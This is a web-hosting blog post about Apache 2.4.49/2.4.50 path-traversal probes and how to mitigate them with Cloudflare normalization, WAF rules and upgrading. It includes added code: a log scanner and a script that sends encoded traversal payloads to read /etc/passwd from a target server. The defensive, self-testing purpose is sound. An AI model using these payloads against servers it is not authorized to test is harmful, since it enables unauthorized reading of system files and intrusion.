The other day when looking at my ConfigServer Security logs, I saw the following line:
I’ve been getting a few of these recently. Attempts to access paths on my server that look like this:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
It looks strange because of the percent-encoded characters: “%2e” is the URL encoding of a dot (.). Decoded, the path above is actually:
/cgi-bin/../../../../../../../../../etc/hosts
This is a path traversal (also called directory traversal) attack: each “..” steps one directory up, so enough of them climb out of the web root to the filesystem root, and the request then reads /etc/hosts. These probes target a path-normalization bug in Apache 2.4.49 and 2.4.50 (CVE-2021-41773 and CVE-2021-42013). Here’s how to protect yourself from it.
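To make the decoding concrete, here is an added example (my own code, not part of the original post) that does what a normalizing proxy or WAF has to do before matching rules: percent-decode the request target, collapse “.” and “..” segments, and flag any request that tries to climb above the web root. It handles the single-encoded form seen in the log and also the double-encoded form (“%%32%65”, which decodes to “%2e” and then to “.”). The log lines are constructed for the example; the client IPs and most of the paths are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The first
# two request paths are the traversal patterns scanners send; the other two
# are ordinary requests, one of which contains a harmless in-root "..".
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:00:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 403 199
203.0.113.10 - - [01/Jan/2024:00:00:02 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 403 199
198.51.100.7 - - [01/Jan/2024:00:00:03 +0000] "GET /wp-content/uploads/../themes/style.css HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:00:00:04 +0000] "GET /index.php?p=1 HTTP/1.1" 200 4096
"""

# Pull the request target out of a Combined-Log-Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_path(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode the path part until it stops changing (bounded), so
    that double-encoded sequences such as %%32%65 -> %2e -> . are resolved."""
    path = raw.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def normalize(path: str) -> tuple[str, int]:
    """Resolve '.' and '..' segments the way a filesystem would.

    Returns the normalized path and how many times '..' tried to climb
    above '/'; any count above zero means the request escaped the root."""
    escapes = 0
    stack: list[str] = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escapes


def classify(raw_target: str) -> dict:
    """Decode and normalize one request target and say whether it traverses."""
    decoded = decode_path(raw_target)
    normalized, escapes = normalize(decoded)
    return {
        "raw": raw_target,
        "decoded": decoded,
        "normalized": normalized,
        "traversal": escapes > 0,
    }


def scan_log(text: str) -> list[dict]:
    """Return one finding per log line whose target escapes the web root."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        result = classify(m.group("target"))
        if result["traversal"]:
            result["client"] = line.split(" ", 1)[0]
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']}: {f['raw']}")
        print(f"    decoded    -> {f['decoded']}")
        print(f"    normalized -> {f['normalized']}")
```

The third sample line is the reason the check counts escapes rather than just looking for “..”: a “..” that stays inside the document root (/wp-content/uploads/../themes/style.css) is legitimate and normalizes to /wp-content/themes/style.css, while the two /cgi-bin/ requests both normalize to a file under /etc. Run the decoding to a fixed point, as above, or a double-encoded probe sails past a single-pass decoder.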
Method 1: Use Cloudflare URL Normalization
If your traffic is proxied through Cloudflare (the orange-cloud DNS records), you can turn on the “Normalize incoming URLs” option in the rules settings of the dashboard, as shown here:
This setting “normalizes” URLs (it decodes percent-encoding and collapses “.” and “..” segments) before they are matched against your Page Rules, firewall rules, and the WAF. It matters because you don’t want attackers to slip past your carefully crafted rules with tricks like encoding the URL. The second option, “Normalize URLs to origin”, applies the same normalization to the request that Cloudflare forwards to your server. It’s arguably the more important of the two, because the consequences of the origin server being compromised are so much more severe.
Method 2: Enable the Cloudflare WAF Rules to Block URLs like This
This method is only available on Cloudflare’s “Pro” plan and above. I’ve talked about the benefits of the Cloudflare Pro plan before, here on the NameHero blog, and I use it myself on my site WP-Tweaks.com to save my web hosting from resource-sucking requests.
For Pro Cloudflare users, you can enable the following two WAF rules:
100045 and 100045A
You can search for these rules in the “Managed Firewall” section like this:
If you’re worried about blocking legitimate users, set the rule’s Mode to “Challenge” instead of “Block”. Every bot I’ve seen so far has failed the JS “Challenge” that Cloudflare poses, and it delays legitimate users by just a few seconds. I don’t see why a real user would be requesting this kind of URL, but even if they do, it’s not going to pose a problem for them.
Method 3: Update Apache to Version 2.4.51
The methods above only help when the malicious request passes through Cloudflare, which means the attacker is using a hostname that is proxied by Cloudflare. If they send the request to your server’s IP address directly, Cloudflare never sees it. In fact, in the first screenshot that I showed, the URL hit my server without going through Cloudflare, since I’m already protected against that kind of thing. You can narrow that exposure by firewalling the origin so that only Cloudflare’s published IP ranges can reach ports 80 and 443, but that is a mitigation, not a fix.
The real fix is to update Apache to 2.4.51 (or later) if you haven’t already done so. The traversal works against 2.4.49 and 2.4.50 because of a bug in how those releases normalized encoded path segments: the encoded dots were not collapsed before the path was mapped to the filesystem, so the “Require all denied” protection on directories outside the document root could be bypassed, and with mod_cgi enabled the same bug allowed remote code execution. The fix shipped in 2.4.50 was incomplete (double-encoded dots still got through), which is why 2.4.51 is the version to be on. Releases before 2.4.49 are not affected by this particular bug, but keeping Apache current is the point.
While Methods 1 and 2 are optional, Method 3 is pretty much mandatory regardless of any other protections you have. Cloudflare can only protect you against traffic it sees, and you can’t afford to run a vulnerable server because malicious requests will get through. Such is the responsibility that comes with having your own VPS or dedicated server!
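Two checks a practitioner will want after reading Method 3, as an added example (my own code, not part of the original post): first, classify the version string from “httpd -v” or a Server header against the affected releases; second, send the traversal paths to your own origin, byte for byte, and confirm the server refuses them rather than returning file contents. The probe paths are constructed for the example, the host name you pass in is an assumption, and the banners in the test are made up.

```python
import http.client
import re
from typing import List, Optional, Tuple

# Releases affected by the 2021 path-traversal bug: 2.4.49 (original flaw,
# CVE-2021-41773) and 2.4.50 (incomplete fix, CVE-2021-42013). 2.4.51 is the
# first fully fixed release; earlier releases never had the bug.
VULNERABLE = {"2.4.49", "2.4.50"}
BANNER_RE = re.compile(r"Apache/(\d+\.\d+\.\d+)")

# Constructed probe paths (assumption: /cgi-bin/ is mapped, as it is in the
# stock config). Nine ".." segments is plenty to reach "/" from any sane root.
PROBES = [
    # Single-encoded dots, the variant seen in the log excerpt above.
    "/cgi-bin/.%2e/" + "%2e%2e/" * 8 + "etc/passwd",
    # Double-encoded dots, the variant that bypassed the 2.4.50 fix.
    "/cgi-bin/" + ".%%32%65/" * 9 + "etc/passwd",
]


def parse_version(banner: str) -> Optional[str]:
    """Extract x.y.z from 'httpd -v' output or a Server: header value."""
    m = BANNER_RE.search(banner)
    return m.group(1) if m else None


def version_status(banner: str) -> str:
    """'vulnerable', 'not affected' (by this bug), or 'unknown' if not Apache."""
    v = parse_version(banner)
    if v is None:
        return "unknown"
    return "vulnerable" if v in VULNERABLE else "not affected"


def probe(host: str, port: int = 80, timeout: float = 5.0) -> List[Tuple[str, int, bool]]:
    """GET each traversal path exactly as written (http.client does no
    client-side normalization) and report (path, status, leaked), where
    leaked means a 200 with /etc/passwd content in the body."""
    results = []
    for path in PROBES:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers={"Host": host})
            resp = conn.getresponse()
            body = resp.read(4096).decode("utf-8", "replace")
            leaked = resp.status == 200 and "root:" in body
            results.append((path, resp.status, leaked))
        finally:
            conn.close()
    return results


def summarize(results: List[Tuple[str, int, bool]]) -> str:
    """Collapse probe results into one verdict for the origin."""
    return "VULNERABLE" if any(leaked for _, _, leaked in results) else "blocked"


if __name__ == "__main__":
    import subprocess
    import sys

    # Local version check; 'httpd' may be 'apache2' on Debian-family systems.
    for binary in ("httpd", "apache2"):
        try:
            out = subprocess.run([binary, "-v"], capture_output=True, text=True).stdout
            print(binary, "->", version_status(out))
            break
        except FileNotFoundError:
            continue

    # Optional remote check: python3 this_file.py origin.example.com
    if len(sys.argv) > 1:
        results = probe(sys.argv[1])
        for path, status, leaked in results:
            print(status, "LEAKED" if leaked else "ok", path)
        print(summarize(results))
```

Run the probe against your own origin by IP as well as by hostname, since the whole point of Method 3 is the path that bypasses Cloudflare. Do not trust the banner alone in either direction: distributions backport fixes without changing the version string, and a “2.4.49” that was patched by the vendor will still be reported as vulnerable here, which is exactly why the live probe is the check that settles it. If you reproduce this with curl instead, pass “--path-as-is”; curl squashes literal “/../” segments before sending, and the encoded forms are what need to reach the server untouched.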
I’m a NameHero team member, and an expert on WordPress and web hosting. I’ve been in this industry since 2008. I’ve also developed apps on Android and have written extensive tutorials on managing Linux servers. You can contact me on my website WP-Tweaks.com!